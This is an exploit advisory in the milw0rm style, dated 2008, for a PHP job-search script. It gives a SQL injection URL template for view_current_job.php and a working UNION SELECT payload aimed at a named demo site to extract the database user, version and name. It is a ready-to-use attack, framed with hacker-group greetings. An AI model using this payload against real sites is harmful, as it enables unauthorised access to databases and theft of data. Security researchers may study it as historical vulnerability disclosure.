#########################################################
#
#   Job site scriptt Design by i-netsolution (id) SQL Injection Vulnerability
#
#########################################################
#
#    Author: d3b4g
#
#    Home :  www.hotlism.org
# 
#    email:  bl4ckend[at]gmail[dot]com
#
#                     
#
##########################################################
#    HomE script : http://www.demo.2daytemplates.com/ijobsearch/
#    Language : PHP      
#    Risk: High
#     
##########################################################
#
#    DorK : N/A
#
##########################################################


-------------------------------------------------------------
Exploit: http://target.com/[path]view_current_job.php?jid=[sql]

demo : 
http://www.demo.2daytemplates.com/ijobsearch/view_current_job.php?jid=-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

---------------------------------------------------------------


-----------------------------------------------------------
Greetz: Str0ke || Hotlism.org || All [[darkc0de.com]] friends 
-----------------------------------------------------------
I am a maldivian :)


# milw0rm.com [2008-11-10]